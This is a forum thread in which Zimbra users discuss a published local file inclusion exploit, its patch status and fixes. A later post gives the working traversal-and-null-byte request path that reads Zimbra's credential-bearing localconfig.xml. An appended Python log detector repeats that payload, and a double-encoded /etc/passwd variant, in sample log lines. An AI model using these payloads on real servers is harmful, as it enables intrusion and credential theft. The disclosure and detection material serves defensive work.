
Thread: zimbra 0-day

  1. #1
    maumar is offline Elite Member
    Join Date
    Mar 2007
    Location
    Small village in the center of Italy
    Posts
    348
    Rep Power
    8

    Default zimbra 0-day

    It was published on the Exploit Database by Offensive Security. I suppose you are aware of it; in that case, sorry.

  2. #2
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,504
    Rep Power
    57

    Default

    Quote Originally Posted by maumar View Post
    It was published on the Exploit Database by Offensive Security. I suppose you are aware of it; in that case, sorry.
    Please file this in bugzilla.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  3. #3
    MKC
    MKC is offline Member
    Join Date
    Feb 2011
    Posts
    10
    Rep Power
    4

    Default

    If anybody's interested, I've analyzed the bug and developed an independent fix for it.
    I've posted everything on my blog, which sadly is in French.

    I haven't taken the time to translate all this, but if some users or people working on Zimbra want to know more about what I did, just get in touch with me

  4. #4
    quanah is offline Zimbra Employee
    Join Date
    May 2007
    Location
    Zimbra
    Posts
    1,271
    Rep Power
    10

    Default

    Hi,

    Thank you for sharing your research. These issues were resolved with a patch for our 7.2.2 and 8.0.2 and subsequent releases in February of 2013.

    --Quanah
    Quanah Gibson-Mount
    Server Architect
    Zimbra, Inc
    --------------------
    Zimbra :: the leader in open source messaging and collaboration

  5. #5
    MKC
    MKC is offline Member
    Join Date
    Feb 2011
    Posts
    10
    Rep Power
    4

    Default

    The exploit was advertised as a 0day, and I took the author's word for it.
    I feel silly now, sorry about this!

  6. #6
    dik23 is offline Advanced Member
    Join Date
    Dec 2010
    Location
    UK
    Posts
    227
    Rep Power
    4

    Default

    Better a false alarm than no alarm

  7. #7
    anndro is offline Starter Member
    Join Date
    Dec 2013
    Posts
    2
    Rep Power
    1

    Default

    I updated my Zimbra to 8.0.5 but the exploit is still working. Here is a quick fix for protection, in Turkish, but I think it can help:

    http://www.bilgiguvenligi.gov.tr/kri...l-aciklik.html

  8. #8
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,504
    Rep Power
    57

    Default

    Quote Originally Posted by anndro View Post
    I updated my Zimbra to 8.0.5 but the exploit is still working. Here is a quick fix for protection, in Turkish, but I think it can help:
    If you think this exploit still exists then file a report in bugzilla.
    Regards


    Bill

  9. #9
    dik23 is offline Advanced Member
    Join Date
    Dec 2010
    Location
    UK
    Posts
    227
    Rep Power
    4

    Default

    Please could you post the bug here so I can subscribe to it?

    Thanks

  10. #10
    expert_az is offline Active Member
    Join Date
    Nov 2007
    Posts
    25
    Rep Power
    7

    Default

    I can confirm, LFI is working on the last 8.0.5 and after 7.2.2.

    LFI is located at:
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

    http://www.exploit-db.com/exploits/30085/

    $ zmcontrol -v
    Release 8.0.5_GA_5839.RHEL6_64_20130910123908 RHEL6_64 FOSS edition.
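Added example, not from the thread or from Zimbra: a small Python detector that scans web-server access-log lines for abuse of the `skin` parameter on the endpoint quoted above, flagging traversal sequences, absolute paths and the `%00` truncation (including double-encoded forms) and marking requests that came back with a 200. The log lines, client addresses and user agents are constructed; only the first URI mirrors the path in the post.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines in Apache "combined" format; the addresses,
# timestamps and user agents are invented, only the first URI mirrors the path
# quoted in the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2013:12:00:01 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 5120 "-" "curl/7.29.0"
203.0.113.6 - - [10/Dec/2013:12:00:02 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=harmony HTTP/1.1" 200 87342 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2013:12:00:03 +0000] "GET /res/ZmMsg.js.zgz?skin=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "python-requests/2.0"
"""

# Fields we need from a combined-format line: client IP, request URI, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)

def is_suspicious_skin(value: str) -> bool:
    """A legitimate skin name is a plain identifier; traversal sequences, an
    absolute path or an embedded NUL (the %00 truncation trick) are not."""
    decoded = unquote(value)  # parse_qs decoded once already; catch double encoding
    return ".." in decoded or "\x00" in decoded or decoded.startswith("/")

def find_lfi_attempts(log_text: str) -> list:
    """Return one record per request whose skin parameter looks like LFI."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("uri")).query
        for skin in parse_qs(query, keep_blank_values=True).get("skin", []):
            if is_suspicious_skin(skin):
                hits.append({
                    "ip": m.group("ip"),
                    "skin": unquote(skin).replace("\x00", "\\x00"),
                    "status": int(m.group("status")),
                    # A 200 on a traversal request is the case to escalate.
                    "likely_success": m.group("status") == "200",
                })
    return hits

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```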
